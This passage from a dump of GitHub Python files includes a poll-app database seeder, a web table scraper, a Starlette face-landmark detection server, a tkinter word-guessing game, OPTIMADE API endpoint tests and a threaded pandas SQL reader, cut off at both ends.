100\nAGE_MIN = 18\nPOLL_RADIUS_MAX = 200\nPOLL_RADIUS_MIN = 150\n\ndef get_random_date(start, end, input_format, output_format):\n format = '%Y-%m-%d'\n stime = datetime.datetime.strptime(start, input_format)\n etime = datetime.datetime.strptime(end, input_format)\n td = etime - stime\n return (random.random() * td + stime).strftime(output_format)\n\ndef load_sample_values(filename):\n df = pd.read_csv(filename, delimiter=',')\n # remove nan values and return as dict\n return {df[column].name: [y for y in df[column] if not pd.isna(y)] for column in df}\n\ndef load_polls(filename):\n df = pd.read_csv(filename, delimiter=',')\n return df.groupby(['Poll', 'Category', 'Description']).apply(lambda s: s[['Answer']].to_dict(orient='records')).to_dict()\n\n\ndef create_user(email, LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX):\n user = User(email)\n user.gender = random.choice(sample_values['Gender'])\n user.first_name = names.get_first_name(gender = user.gender.lower())\n user.last_name = names.get_last_name()\n user.longitude = random.uniform(LONGITUDE_MIN, LONGITUDE_MAX)\n user.latitude = random.uniform(LATITUDE_MIN, LATITUDE_MAX)\n user.age = random.randint(AGE_MIN,AGE_MAX)\n user.ethnicity = random.choice(sample_values['Ethnicity'])\n user.industry = random.choice(sample_values['Industry'])\n user.religion = random.choice(sample_values['Religion'])\n user.income_range = random.choice(sample_values['Income range'])\n user.education = random.choice(sample_values['Education'])\n user.marital_status = random.choice(sample_values['Marital status'])\n user.veteran = random.random() < 0.01\n\n return user\n\ndef create_poll(email, name, category, description, LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX, REGION):\n poll = Poll(\n email,\n category,\n name,\n REGION,\n False,\n description,\n get_random_date('2020-01-01','2021-01-01','%Y-%m-%d', '%Y-%m-%d'),\n get_random_date('2021-01-02','2022-01-01','%Y-%m-%d', '%Y-%m-%d'),\n random.uniform(LONGITUDE_MIN, LONGITUDE_MAX),\n random.uniform(LATITUDE_MIN, LATITUDE_MAX),\n random.randint(POLL_RADIUS_MIN, POLL_RADIUS_MAX),\n True)\n\n return poll\n\n\ndef populate_database_with_coordinates(LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX, REGION):\n REGION_NAME = REGION.replace(' ', '').lower()\n\n with app.app_context():\n # create voters who will only vote on answers\n for v in range(0, 100):\n user = create_user(f'voter_{REGION_NAME}_{v}@email.com', LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX)\n db.session.add(user)\n db.session.commit()\n\n poll_count = 0\n for poll, answers in polls.items():\n # create user and poll owned by the user\n user = create_user(f'owner_{REGION_NAME}_{poll_count}@email.com', LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX)\n poll = create_poll(f'owner_{REGION_NAME}_{poll_count}@email.com', poll[0], poll[1], poll[2], LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX, REGION)\n\n poll_count += 1\n\n # 75% chance to have a non-expired poll\n if(random.random() < 0.75):\n poll.end_at = get_random_date('2023-01-01','2024-01-01','%Y-%m-%d', '%Y-%m-%d')\n\n db.session.add(poll)\n db.session.add(user)\n db.session.flush()\n\n # create answers\n answer_ids = []\n for answer_item in answers:\n answer = Answer(poll.id, answer_item['Answer'])\n db.session.add(answer)\n db.session.flush()\n answer_ids.append(answer.id)\n\n # for each answer_id, generate a random weighting\n weighting = []\n for j in answer_ids:\n weighting.append(random.random())\n\n # generate a list of answer_ids to vote on with a random length\n answer_ids_to_vote_on = random.choices(answer_ids, weights=weighting, k=random.randint(50,100))\n\n # vote with random number of voters with a random weighting\n voter_num = 0\n for answer_id in answer_ids_to_vote_on:\n vote = Vote(f'voter_{REGION_NAME}_{voter_num}@email.com', poll.id, answer_id)\n voter_num+=1\n db.session.add(vote)\n\n db.session.commit()\n\n# drop tables if exist\n# create all tables\nwith app.app_context():\n db.drop_all()\n db.create_all()\n\n# load sample values for each property from csv file\nsample_values = load_sample_values('tools/dbsamplevalues.csv')\npolls = load_polls('tools/polls.csv')\n\n# Sydney\npopulate_database_with_coordinates(-33.918015, -33.757231, 150.956441, 151.248958, 'Oceania')\n\n# London\npopulate_database_with_coordinates(51.380099, 51.575968, -0.276916, 0.046813, 'Europe')\n\n# Nairobi\npopulate_database_with_coordinates(-1.336352, -1.235159, 36.732246, 36.901376, 'Africa')\n\n# Sao Paolo\npopulate_database_with_coordinates(-23.633941, -23.448576, -46.754080, -46.497701, 'South America')\n\n# Singapore\npopulate_database_with_coordinates(1.309941, 1.412909, 103.76105, 103.897682, 'Asia')\n\n# Toronto\npopulate_database_with_coordinates(43.755408, 43.914581, -79.688323, -79.189666, 'North America')\n","repo_name":"alou64/mapocracy-api","sub_path":"tools/populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25833273822","text":"from collections import Counter\nimport re\nimport sys\n\nfile = open(sys.argv[1])\nstr = file.read()\nlist = re.split(\"[\\s.,;]+\", str)\ni = 0\nfor item in list:\n list[i] = item.lower()\n i+=1\nres = dict(Counter(list))\ni = 1\nfor key in sorted(res.keys()):\n print(i, key, \":\", res[key])\n i+=1\nfile.close()\n","repo_name":"olena-hul/DQE_HW","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40427957597","text":"import requests\nfrom BeautifulSoup import BeautifulSoup\nimport csv\nimport pandas as pd\n\nurl = 'http://hdr.undp.org/en/composite/HDI'\nresponse = requests.get(url) #headers not specified\nhtml = response.content\n\nsoup = BeautifulSoup(html)\ntable = soup.find('table', attrs = {\"width\" : 2268})\n\nrow_list = []\nfor row in table.findAll('tr'):\n\tcell_list = []\n\tfor cell in row.findAll('td'):\n\t\ttxt = cell.text.encode('utf-8')\n\t\tcell_list.append(txt)\n\trow_list.append(cell_list)\n\noutfile = open(\"./hdi.csv\", \"wb\") #wb - opened by writing in binary mode\nwriter = csv.writer(outfile, delimiter = ';')\nwriter.writerows(row_list)\nreader = csv.reader(outfile)#, delimiter = ';')\n\n# has to be done differently bc it's in a different format than salary.csv ?\ndf = pd.read_csv(\"./hqi.csv\", header = None, error_bad_lines = False, delimiter=';')\ndf.rename(columns = {0: 'idx', 1: 'Country', 2: 'Val1', 3: 'Val2'}, inplace = True)\ndf.sort_values(by = 'Val1', inplace = True, ascending = False)\n\n# the last thing - reset values of 'idx'\ndf.to_excel(\"sorted_hqi.xlsx\", index = False) #should it have the prof in the name?\n\n\n\n\n\n#print table.prettify()","repo_name":"mik0why/place-to-live","sub_path":"hdi-scraper.py","file_name":"hdi-scraper.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16477873529","text":"a=input(\"Enter a binary number: \")\nb=int(input(\"Enter 2nd number: \"))\ndef left_shift(a):\n return (a+\"0\")\ndef right_shift(a):\n s=a[:-1]\n return (\"0\"+s)\nch=int(input(\"Enter 0 for left shift and 1 for right shift: \"))\nif(ch==0):\n for i in range(0,b):\n a=left_shift(a)\nelse:\n for i in range(0,b):\n a=right_shift(a)\nprint(a)","repo_name":"yash1120/Cpp-learning","sub_path":"miss/shifting.py","file_name":"shifting.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25224962606","text":"import sys\n\nif len(sys.argv) == 1:\n print(sys.argv[0])\nelse:\n nome = sys.argv[1]\n arquivo = open(nome, \"r\")\n for linha in arquivo.readlines():\n print(linha[:-1])\n\n arquivo.close()","repo_name":"thalysonalexr/livro-progpython","sub_path":"cap-09/Exercicio-9-1.py","file_name":"Exercicio-9-1.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42629475112","text":"import argparse\nimport base64\nimport io\nimport importlib.util\nfrom pathlib import Path\nimport ssl\n\nimport cv2 as cv\nfrom jinja2 import Environment, FileSystemLoader\nimport numpy as np\nimport PIL.Image\nfrom starlette.applications import Starlette\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.responses import HTMLResponse, JSONResponse\nimport uvicorn\n\n\napp = Starlette()\napp.mount('/static', StaticFiles(directory='static'))\napp.g = {}\ntemplates_dir = str(Path.cwd()/'templates')\nenv = Environment(loader=FileSystemLoader(templates_dir), trim_blocks=True)\n\n\ndef get_global(name):\n return app.g[name]\n\n\ndef set_global(name, value):\n global app\n app.g[name] = value\n\n\n@app.route('/')\nasync def echo(request):\n template = env.get_template('index.html')\n return HTMLResponse(template.render(static_url='/static'))\n\n\n@app.route('/detect', methods=['POST'])\nasync def detect(request):\n data = await request.json()\n _, content = data['imgBase64'].split(',')\n decoded = base64.b64decode(content)\n image = read_from_bytes(decoded)\n faces, boxes = detect_faces(image)\n if not faces:\n return JSONResponse({'success': False, 'message': 'no faces detected'})\n model = get_global('model')\n predictions = model.predict(faces)\n points, error = convert_to_absolute(predictions, boxes)\n if error is not None:\n return JSONResponse({'success': False, 'message': error})\n return JSONResponse({'success': True, 'result': points})\n\n\ndef detect_faces(image):\n cascade = get_global('cascade')\n arr = np.asarray(image)\n gray = cv.cvtColor(arr, cv.COLOR_RGBA2GRAY)\n boxes = cascade.detectMultiScale(gray, 1.3, 5)\n faces = [read_from_bytes(gray[y:y+h, x:x+w]) for (x, y, w, h) in boxes]\n return faces, boxes\n\n\ndef convert_to_absolute(predictions, boxes):\n if len(predictions) != len(boxes):\n return None, 'number of predictions is not equal to number of boxes'\n n = len(predictions[0]) // 2\n rescaled = []\n for points, box in zip(predictions, boxes):\n x, y, w, h = box\n points[:n] = x + w*(points[:n] + 1)/2.\n points[n:] = y + h*(points[n:] + 1)/2.\n points = np.round(points).astype(int).tolist()\n box = box.astype(int).tolist()\n rescaled.append({'box': box, 'x': points[:n], 'y': points[n:]})\n return rescaled, None\n\n\ndef read_from_bytes(obj):\n if isinstance(obj, bytes):\n image = PIL.Image.open(io.BytesIO(obj))\n elif isinstance(obj, np.ndarray):\n image = PIL.Image.fromarray(obj)\n else:\n raise TypeError(f'unexpected image type: {type(obj)}')\n return image\n\n\ndef serve():\n parser = argparse.ArgumentParser()\n parser.add_argument('--host', dest='host', default='0.0.0.0')\n parser.add_argument('--port', dest='port', default=8080, type=int)\n parser.add_argument('--debug', action='store_true', default=False)\n parser.add_argument('--model', dest='model_path', default='code/points_15.py')\n parser.add_argument('--weights', dest='weights_path', default='weights/points_15.pth')\n parser.add_argument('--cert', dest='cert', default=None)\n parser.add_argument('--key', dest='key', default=None)\n parser.add_argument('--models-dir', default=None)\n parser.add_argument('--cascades-dir', default=None)\n args = parser.parse_args()\n\n if args.models_dir is None:\n if args.debug:\n args.models_dir = Path.cwd().parent/'models'\n else:\n args.models_dir = Path('/models')\n\n if args.cascades_dir is None:\n if args.debug:\n args.cascade_dir = Path.cwd().parent/'cascades'\n else:\n args.cascade_dir = Path('/cascades')\n\n model_path = args.models_dir/args.model_path\n weights_path = args.models_dir/args.weights_path\n model = create_model(model_path, weights_path)\n cascade = cv.CascadeClassifier(str(args.cascade_dir/'haar_face_frontal.xml'))\n\n app.debug = args.debug\n set_global('model', model)\n set_global('cascade', cascade)\n\n config = dict(app=app, host=args.host, port=args.port)\n if args.cert is not None and args.key is not None:\n # https://github.com/encode/uvicorn/pull/213\n config.update(dict(\n ssl_version=ssl.PROTOCOL_SSLv23,\n cert_reqs=ssl.CERT_OPTIONAL,\n certfile=args.cert,\n keyfile=args.key\n ))\n\n uvicorn.run(**config)\n\n\ndef create_model(model_path, weights_path):\n module_name = model_path.stem\n spec = importlib.util.spec_from_file_location(module_name, model_path)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n model = module.model_factory(1, 30)\n model.load(weights_path)\n model.train(False)\n return model\n\n\nif __name__ == '__main__':\n serve()\n","repo_name":"devforfu/face-landmarks-detection","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6148445691","text":"from tkinter import *\nimport string\n\nfrom controller import Termo\nfrom pathResolver import resource_path\n\nclass Game(Frame):\n def __init__(self, parent_container, parent):\n Frame.__init__(self, parent_container)\n self.parent = parent\n self.root = self\n\n # Mainframe\n mainframe = Frame(self.root, width=700, height=850, bg='#6e5c62', padx=120, pady=45)\n mainframe.grid(column=0, row=0, sticky=(N, S, E, W))\n mainframe.columnconfigure(0, weight=1)\n mainframe.rowconfigure(2, weight=1)\n mainframe.grid_propagate(0)\n\n # Título\n self.title_image = PhotoImage(file=resource_path('images/title.png'))\n Label(mainframe, image=self.title_image, bg='#6e5c62').grid(row=0, column=0, sticky=(N, E, W))\n\n # Jogador 1\n score_player1 = Frame(mainframe, bg='#6e5c62')\n score_player1.grid(column=0, row=1, sticky=W, pady='35 0')\n score_player1.columnconfigure(0, weight=1)\n\n self.player1_name = Label(score_player1, font=('Fira Code', 20, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player1_name.grid(row=0, column=0, sticky=W)\n self.player1_score = Label(score_player1, text=\"000\", font=('Fira Code', 15, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player1_score.grid(row=1, column=0, sticky=W)\n\n # Jogador 2\n score_player2 = Frame(mainframe, bg='#6e5c62')\n score_player2.grid(column=0, row=1, sticky=E, pady='35 0')\n score_player2.columnconfigure(0, weight=1)\n\n self.player2_name = Label(score_player2, font=('Fira Code', 20, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player2_name.grid(row=0, column=0, sticky=E)\n self.player2_score = Label(score_player2, text=\"000\", font=('Fira Code', 15, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player2_score.grid(row=1, column=0, sticky=E)\n\n # Warnings\n self.warnings = []\n\n # Palavras devem ter 5 letras\n self.five_letters_warning_image = PhotoImage(file=resource_path('images/five-letters-warning.png'))\n self.warnings.append(Label(mainframe, image=self.five_letters_warning_image, bg='#6e5c62'))\n\n # Palavra não reconhecida\n self.invalid_word_warning_image = PhotoImage(file=resource_path('images/invalid-word-warning.png'))\n self.warnings.append(Label(mainframe, image=self.invalid_word_warning_image, bg='#6e5c62'))\n\n # Palavra certa\n self.correct_word_warning_image = PhotoImage(file=resource_path('images/correct-word-warning.png'))\n self.warnings.append(Label(mainframe, image=self.correct_word_warning_image, bg='#6e5c62'))\n\n # Empate\n self.draw_warning_image = PhotoImage(file=resource_path('images/draw-warning.png'))\n self.warnings.append(Label(mainframe, image=self.draw_warning_image, bg='#6e5c62'))\n\n # Tabuleiro\n self.initBoardImages()\n\n board_frame = Frame(mainframe, bg='#6e5c62')\n board_frame.grid(column=0, row=2, sticky=N, pady='65 0')\n self.board = [[0] * 5 for _ in range(6)]\n self.board_value = [[''] * 5 for _ in range(6)]\n for row in range(6):\n for column in range(5):\n self.board[row][column] = Label(board_frame, image=self.empty[''], bg='#6e5c62', fg=\"white\")\n self.board[row][column].grid(row=row, column=column)\n\n self.end_message_word = Label(\n mainframe, \n text='A palavra correta era \"\"', \n font=('Fira Code', 16, 'bold'), \n bg='#6e5c62', \n fg=\"#FAFAFF\"\n )\n\n self.end_message = Label(\n mainframe, \n text='Pressione qualquer tecla para jogar novamente.', \n font=('Fira Code', 12, 'bold'), \n bg='#6e5c62', \n fg=\"#FAFAFF\"\n )\n\n for child in mainframe.winfo_children(): \n child.grid_configure(padx=10)\n\n def open(self, player1_name, player2_name):\n self.parent.title(\"Termo - Game\")\n self.parent.geometry('700x850')\n self.parent.resizable(width=False, height=False)\n self.parent.columnconfigure(0, weight=1)\n self.parent.rowconfigure(0, weight=1)\n\n self.player1_name.config(text=player1_name.upper())\n self.player2_name.config(text=player2_name.upper())\n\n self.controller = Termo(player1_name, player2_name, self)\n self.controller.novaPartida()\n\n self.resetBoard()\n\n def initBoardImages(self):\n self.empty = {\n '': PhotoImage(file=resource_path('images/empty-tile/empty-tile.png')), \n 'selected-row': PhotoImage(file=resource_path('images/empty-tile/empty-tile-selected-row.png')),\n 'selected-tile': PhotoImage(file=resource_path('images/empty-tile/empty-tile-selected-tile.png')),\n }\n self.right = dict()\n self.semi_correct = dict()\n self.wrong = dict()\n\n for letter in string.ascii_lowercase:\n self.empty[letter] = PhotoImage(file=resource_path(f'images/empty-tile/empty-tile-{letter}.png'))\n\n for letter in string.ascii_lowercase + 'áéíóúâêôãõç':\n self.right[letter] = PhotoImage(file=resource_path(f'images/right-tile/right-tile-{letter}.png'))\n self.semi_correct[letter] = PhotoImage(file=resource_path(f'images/semi-correct-tile/semi-correct-{letter}.png'))\n self.wrong[letter] = PhotoImage(file=resource_path(f'images/wrong-tile/wrong-tile-{letter}.png'))\n\n def refreshScore(self, scorePlayer1, scorePlayer2):\n self.player1_score.config(text=f'{scorePlayer1:03d}')\n self.player2_score.config(text=f'{scorePlayer2:03d}')\n\n def setCurPlayer(self, player):\n self.player1_name.config(fg='#FAFAFF')\n self.player2_name.config(fg='#FAFAFF')\n self.player1_score.config(fg='#FAFAFF')\n self.player2_score.config(fg='#FAFAFF')\n \n if player == 0:\n self.player1_name.config(fg='#D3AD69')\n self.player1_score.config(fg='#D3AD69')\n else: \n self.player2_name.config(fg='#D3AD69')\n self.player2_score.config(fg='#D3AD69')\n\n def showNotification(self, code, autoFade=True):\n self.warnings[code].place(relx=0.5, y=210, anchor=CENTER)\n if autoFade:\n self.warnings[code].after(1500, lambda: self.warnings[code].place_forget())\n \n def notifyWinner(self, player, word, rightWord=True):\n self.showNotification(3 if player == 2 else 2, False)\n\n self.player1_name.config(fg='#FAFAFF')\n self.player1_score.config(fg='#FAFAFF')\n self.player2_name.config(fg='#FAFAFF')\n self.player2_score.config(fg='#FAFAFF')\n\n if player == 0 or player == 2:\n self.player1_name.config(fg='#3AA394')\n self.player1_score.config(fg='#3AA394')\n \n if player == 1 or player == 2: \n self.player2_name.config(fg='#3AA394')\n self.player2_score.config(fg='#3AA394')\n\n if rightWord:\n self.player1_score.config(text='---')\n self.player2_score.config(text='---')\n\n if self.cur_row < 6:\n [tile.config(image=self.empty['']) for tile in self.board[self.cur_row]]\n \n self.unbind('')\n self.bind('', self.resetGame)\n\n self.end_message_word.config(text=f'A palavra correta era \"{word.upper()}\"')\n self.end_message_word.place(relx=0.5, rely=0.95, anchor=CENTER)\n self.end_message.place(relx=0.5, rely=1, anchor=CENTER)\n\n def resetGame(self, keyPress):\n self.resetBoard()\n self.controller.novaPartida()\n\n def takeInput(self, keyPress):\n if keyPress.char.lower() in list(string.ascii_lowercase) and self.cur_column < 5:\n self.board[self.cur_row][self.cur_column].config(image=self.empty[keyPress.char.lower()])\n self.board_value[self.cur_row][self.cur_column] = keyPress.char.lower()\n\n self.cur_column += 1\n\n if self.cur_column < 5:\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])\n elif keyPress.char == '\\x08':\n if self.cur_column < 5:\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-row'])\n\n self.cur_column = max(0, self.cur_column - 1)\n\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])\n self.board_value[self.cur_row][self.cur_column] = ''\n elif keyPress.keysym == 'Return':\n if self.cur_column != 5:\n self.showNotification(0)\n else:\n self.controller.verifyEntry(''.join(self.board_value[self.cur_row]))\n else:\n pass\n\n def resetBoard(self):\n [warning.grid_forget() for warning in self.warnings]\n [warning.place_forget() for warning in self.warnings]\n self.end_message.grid_forget()\n self.end_message_word.grid_forget()\n self.end_message.place_forget()\n self.end_message_word.place_forget()\n\n self.focus_set()\n self.unbind('')\n self.bind('', self.takeInput)\n\n self.cur_row = 0\n self.cur_column = 0\n\n for row in range(6):\n for column in range(5):\n self.board[row][column].config(image=self.empty[''])\n self.board_value[row][column] = ''\n\n [tile.config(image=self.empty['selected-row']) for tile in self.board[self.cur_row]]\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])\n\n def refreshBoard(self, hit_list, word):\n for i in range(len(hit_list)):\n if hit_list[i] == 10:\n self.board[self.cur_row][i].config(image=self.right[word[i]])\n elif hit_list[i] == 5:\n self.board[self.cur_row][i].config(image=self.semi_correct[word[i]])\n else:\n self.board[self.cur_row][i].config(image=self.wrong[word[i]])\n \n self.cur_row += 1\n self.cur_column = 0\n\n if self.cur_row < 6:\n [tile.config(image=self.empty['selected-row']) for tile in self.board[self.cur_row]]\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])","repo_name":"Bredstone/Clone-Jogo-Termo","sub_path":"src/viewJogo.py","file_name":"viewJogo.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1008447357","text":"from optimade.models import (\n StructureResponseMany,\n StructureResponseOne,\n ReferenceResource,\n)\n\nfrom ..utils import RegularEndpointTests\n\n\nclass TestStructuresEndpoint(RegularEndpointTests):\n \"\"\"Tests for /structures\"\"\"\n\n request_str = \"/structures\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"meta\" in self.json_response\n assert self.json_response[\"meta\"][\"data_available\"] == 17\n assert not self.json_response[\"meta\"][\"more_data_available\"]\n assert \"data\" in self.json_response\n assert (\n len(self.json_response[\"data\"])\n == self.json_response[\"meta\"][\"data_available\"]\n )\n\n def test_get_next_responses(self, get_good_response):\n \"\"\"Check pagination\"\"\"\n total_data = self.json_response[\"meta\"][\"data_available\"]\n page_limit = 5\n\n json_response = get_good_response(\n self.request_str + f\"?page_limit={page_limit}\"\n )\n\n cursor = json_response[\"data\"].copy()\n assert json_response[\"meta\"][\"more_data_available\"]\n more_data_available = True\n next_request = json_response[\"links\"][\"next\"]\n\n while more_data_available:\n next_response = get_good_response(next_request)\n next_request = next_response[\"links\"][\"next\"]\n cursor.extend(next_response[\"data\"])\n more_data_available = next_response[\"meta\"][\"more_data_available\"]\n if more_data_available:\n assert len(next_response[\"data\"]) == page_limit\n else:\n assert len(next_response[\"data\"]) == total_data % page_limit\n\n assert len(cursor) == total_data\n\n\nclass TestSingleStructureEndpoint(RegularEndpointTests):\n \"\"\"Tests for /structures/\"\"\"\n\n test_id = \"mpf_1\"\n request_str = f\"/structures/{test_id}\"\n response_cls = StructureResponseOne\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert self.json_response[\"data\"][\"id\"] == self.test_id\n assert self.json_response[\"data\"][\"type\"] == \"structures\"\n assert \"attributes\" in self.json_response[\"data\"]\n assert \"_exmpl_chemsys\" in self.json_response[\"data\"][\"attributes\"]\n\n\nclass TestMissingSingleStructureEndpoint(RegularEndpointTests):\n \"\"\"Tests for /structures/ for unknown \"\"\"\n\n test_id = \"mpf_random_string_that_is_not_in_test_data\"\n request_str = f\"/structures/{test_id}\"\n response_cls = StructureResponseOne\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert \"meta\" in self.json_response\n assert self.json_response[\"data\"] is None\n assert self.json_response[\"meta\"][\"data_returned\"] == 0\n assert not self.json_response[\"meta\"][\"more_data_available\"]\n\n\nclass TestSingleStructureWithRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures/, where has relationships\"\"\"\n\n test_id = \"mpf_1\"\n request_str = f\"/structures/{test_id}\"\n response_cls = StructureResponseOne\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert self.json_response[\"data\"][\"id\"] == self.test_id\n assert self.json_response[\"data\"][\"type\"] == \"structures\"\n assert \"attributes\" in self.json_response[\"data\"]\n assert \"relationships\" in self.json_response[\"data\"]\n assert self.json_response[\"data\"][\"relationships\"] == {\n \"references\": {\"data\": [{\"type\": \"references\", \"id\": \"dijkstra1968\"}]}\n }\n assert \"included\" in self.json_response\n assert len(\n self.json_response[\"data\"][\"relationships\"][\"references\"][\"data\"]\n ) == len(self.json_response[\"included\"])\n\n ReferenceResource(**self.json_response[\"included\"][0])\n\n\nclass TestMultiStructureWithSharedRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures for entries with shared relationships\"\"\"\n\n request_str = \"/structures?filter=id=mpf_1 OR id=mpf_2\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n # mpf_1 and mpf_2 both contain the same reference relationship, so response should not duplicate it\n assert \"data\" in self.json_response\n assert len(self.json_response[\"data\"]) == 2\n assert \"included\" in self.json_response\n assert len(self.json_response[\"included\"]) == 1\n\n\nclass TestMultiStructureWithRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures for mixed entries with and without relationships\"\"\"\n\n request_str = \"/structures?filter=id=mpf_1 OR id=mpf_23\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n # mpf_23 contains no relationships, which shouldn't break anything\n assert \"data\" in self.json_response\n assert len(self.json_response[\"data\"]) == 2\n assert \"included\" in self.json_response\n assert len(self.json_response[\"included\"]) == 1\n\n\nclass TestMultiStructureWithOverlappingRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures with entries with overlapping relationships\n\n One entry has multiple relationships, another entry has other relationships,\n some of these relationships overlap between the entries, others don't.\n \"\"\"\n\n request_str = \"/structures?filter=id=mpf_1 OR id=mpf_3\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert len(self.json_response[\"data\"]) == 2\n assert \"included\" in self.json_response\n assert len(self.json_response[\"included\"]) == 2\n","repo_name":"attlevafritt/tfya92-groupa-optimade-python-tools","sub_path":"optimade-python-tools/tests/server/routers/test_structures.py","file_name":"test_structures.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38426498132","text":"import os\nimport uuid\nimport re\nimport sys\nimport threading\nimport shutil\nimport pandas as pd\nfrom tqdm import tqdm\nfrom queue import Queue\nfrom fast_sql.utils.exception import DB_Exceptions\nfrom concurrent.futures import ThreadPoolExecutor\nfrom fast_sql.utils.common import DB_Pool, collection_error,Sqlalchemy_Pool\n\n\nclass Read_sql:\n\n def __init__(\n self,\n sql,\n con=None,\n thread_num=None,\n encoding='utf8',\n show_progress=False,\n chunksize=15000,\n desc=None\n ):\n if con is not None:\n self.db_pool = Sqlalchemy_Pool(con, num=thread_num + 6, encoding=encoding)\n self.driver = self.db_pool.driver\n self.sql = sql.strip().replace('\\n', ' ')\n self.thread_num = thread_num\n self.avg_list = None\n self.result = []\n self.pd_params = None\n self.lock = threading.Lock()\n self.ordering = None\n self.show_progress = show_progress\n self.progress = None\n self.queue = Queue()\n self.count = None\n self.tqdm = None\n self.chunksize = chunksize\n self.tqdm_w = None\n self.desc = desc\n\n def read_sql(self, **kwargs):\n con = self.db_pool.get_db()\n self.pd_params = kwargs\n self.avg_list = self.verify_sql()\n self.tqdm_init(self.count, weight=85)\n if self.avg_list is None:\n result = pd.read_sql(self.sql, con, **self.pd_params)\n result.columns = [i.upper() for i in result.columns.tolist()]\n self.tqdm_update(self.count)\n else:\n task_list,pool = self.start_thread_read()\n self.get_thread_result(task_list)\n result = self.result.pop(0)\n for i in range(len(self.result)):\n result = result.append(self.result.pop(0), ignore_index=True)\n\n result.columns = [i.upper() for i in result.columns.tolist()]\n\n if self.driver == 'oracle':\n result.drop('NO', axis=1, inplace=True)\n\n if self.ordering:\n result.sort_values([i.strip().upper()\n for i in self.ordering], inplace=True)\n self.db_pool.close_db(con)\n self.result.clear()\n return result\n\n def tqdm_update(self, count=None,mode=None):\n tqdm = self.tqdm if mode is None else self.tqdm_w\n if self.show_progress:\n if count:\n tqdm.update(count)\n\n elif tqdm.n + self.chunksize < self.count:\n tqdm.update(self.chunksize)\n\n else:\n tqdm.update(self.count - tqdm.n)\n\n def tqdm_init(self, count,weight,mode=None):\n if self.show_progress:\n if mode is None:\n self.tqdm = tqdm(total=count, desc=self.desc, ncols=weight)\n else:\n self.tqdm_w = tqdm(total=count, desc=self.desc, ncols=weight)\n\n @collection_error\n def get_sql_query(self, st, en, *args, **kwargs):\n if self.driver == 'oracle':\n sql_1 = f'''\n select * from (select rownum no,d.* from (\n {self.sql}\n ) d where rownum<{en}) where no>={st}\n '''\n else:\n sql_1 = f'''\n select * from ({self.sql}) as t limit {st}{','+str(en)}\n '''\n con = self.db_pool.get_db()\n query = pd.read_sql(sql_1, con, **self.pd_params)\n self.save_query(query)\n self.db_pool.close_db(con)\n del query\n\n def save_query(self, df_value):\n self.lock.acquire()\n self.result.append(df_value)\n self.tqdm_update()\n self.lock.release()\n\n def start_thread_read(self,):\n pool = ThreadPoolExecutor(max_workers=self.thread_num)\n task_list = [pool.submit(self.get_sql_query, st, en)\n for st, en in self.avg_list]\n return task_list,pool\n\n def verify_sql(self):\n con = self.db_pool.get_db()\n self.count = self.get_query_count(con, self.sql)\n # self.chunksize = self.count // self.thread_num // 2\n # self.tqdm_init(self.count, desc='Read the scheduler', weight=85)\n\n if 'order' in self.sql.lower():\n buf = self.sql.split('order')\n self.ordering = buf[1].split('by')[1].strip().split(',')\n self.sql = buf[0]\n\n if self.count < 